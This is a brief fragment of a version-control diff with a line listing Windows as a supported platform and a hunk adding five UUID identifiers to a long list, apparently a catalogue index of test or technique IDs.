supported_platforms:
- windows
+5
View File
@@ -1604,3 +1604,8 @@ d1fa2a69-b0a2-4e8a-9112-529b00c19a41
81cfdd7f-1f41-4cc5-9845-bb5149438e37
b19d74b7-5e72-450a-8499-82e49e379d1a
966f4c16-1925-4d9b-8ce0-01334ee0867d
b8147c9a-84db-4ec1-8eee-4e0da75f0de5
53cf1903-0fa7-4177-ab14-f358ae809eec
bb6b51e1-ab92-45b5-aeea-e410d06405f8
b025c580-029e-4023-888d-a42710d76934
7979dd41-2045-48b2-a54e-b1bc2415c9da